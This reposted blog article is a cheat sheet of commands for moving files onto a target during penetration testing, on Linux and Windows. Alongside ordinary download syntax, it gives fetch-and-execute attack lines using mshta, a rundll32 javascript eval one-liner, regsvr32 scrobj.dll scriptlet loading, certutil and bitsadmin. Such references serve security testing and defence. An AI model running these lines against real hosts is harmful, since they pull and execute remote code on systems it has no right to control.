BestHub
Sign in
Information Security 13 min read

File Transfer Techniques for Penetration Testing: Linux and Windows Download Commands

This article compiles common file download commands and tools used in penetration testing for both Linux and Windows environments, covering utilities such as wget, curl, axel, aria2, PowerShell, certutil, bitsadmin, and others, with example syntax for direct, background, and resumable transfers.

Python Programming Learning Circle
Python Programming Learning Circle
Python Programming Learning Circle
File Transfer Techniques for Penetration Testing: Linux and Windows Download Commands

During penetration testing, transferring files to a target host is often required for privilege escalation or maintaining control; when direct transfer is not possible but the host has network connectivity, downloading files from the internet can be used.

Linux download utilities

Wget

Wget supports resume, multiple files, bandwidth control, etc.

<code>wget http://www.sample-videos.com/video/mp4/big.mp4
wget -b http://www.sample-videos.com/video/mp4/big.mp4
wget -c http://www.sample-videos.com/video/mp4/big.mp4
wget --ftp-user=&lt;user_name&gt; --ftp-password=&lt;Give_password&gt; Download-url-address</code>

Curl

Curl is a versatile downloader that can upload or download files, resume downloads, and supports many protocols.

<code>curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4</code>

Axel

Axel is a lightweight accelerator that opens multiple HTTP connections to download file fragments in parallel.

<code>apt-get install axel
axel http://www.sample-videos.com/video/mp4/big.mp4</code>

Aria2

Aria2 is an open‑source command‑line download accelerator supporting multiple connections and maximum bandwidth usage.

<code>apt-get install aria2
aria2c http://www.sample-videos.com/video/mp4/big.mp4</code>

Perl

Perl can download files using LWP::Simple.

<code>#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");</code>

Python

Python can download a file with urllib2.

<code>#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()</code>

Ruby

Ruby can download a file using Net::HTTP.

<code>#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
  r = http.get("/file")
  open("save_location", "wb") { |file| file.write(r.body) }
}</code>

PHP

PHP can download a file with file() and fwrite.

<code>#!/usr/bin/php
<?php
$data = @file("http://example.com/file");
$lf = "local_file";
$fh = fopen($lf, 'w');
fwrite($fh, $data[0]);
fclose($fh);
?>
</code>

FTP (bash script)

A non‑interactive FTP script can download a file.

<code>ftp 127.0.0.1
username
password
get file
exit</code>

Netcat

Netcat can be used to transfer a file over a listening port.

<code>cat file | nc -l 1234
nc host_ip 1234 > file</code>

Windows download techniques

PowerShell

PowerShell can download a file using System.Net.WebClient.

<code>$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file", "C:\%homepath%\file")</code>

IPC$ share

<code>copy \\192.168.3.1\c$\test.exe E:\file
cmd.exe /k <webdavserver\folder\batchfile.txt</code>

Certutil

Certutil can download files and split them from the cache.

<code>certutil -urlcache -split -f http://192.168.3.1/test.exe file.exe
certutil -urlcache -split -f http://192.168.3.1/test.exe delete</code>

Visual Basic (VBScript)

<code>Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile " C:\%homepath%\file", 2
end with</code>

Tftp

<code>tftp -i IP_ADDRESS PUT C:\%homepath%\file remote_path
tftp -i IP_ADDRESS GET C:\%homepath%\file local_path</code>

Bitsadmin

<code>bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\phpstudy_pro\WWW\b.ps1"
bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt</code>

Mshta

Mshta can execute a remote HTA file.

<code>mshta http://192.168.3.1/run.hta</code>

Rundll32

<code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);</code>

Regsvr32

<code>regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll
regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll</code>

Windows Share

<code>net use x: \\127.0.0.1\share /user:example.com\userID myPassword</code>

Format conversion (Nishang)

<code>PS > .\ExetoText.ps1 evil.exe evil.txt
PS > .\TexttoExe.ps1 evil.text evil.exe</code>

Other utilities

Examples include msxsl.exe, pubprn.vbs, esentutl.exe, extrac32.exe, desktopimgdownldr.exe, etc., which can be abused to download files.

Original source: https://www.cnblogs.com/-mo-/p/12109717.html

Linuxfile downloadCommand-lineWindowspenetration testingsecurity toolsnetwork exploitation
Python Programming Learning Circle
Written by

Python Programming Learning Circle

A global community of Chinese Python developers offering technical articles, columns, original video tutorials, and problem sets. Topics include web full‑stack development, web scraping, data analysis, natural language processing, image processing, machine learning, automated testing, DevOps automation, and big data.

0 followers
Reader feedback

How this landed with the community

login Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment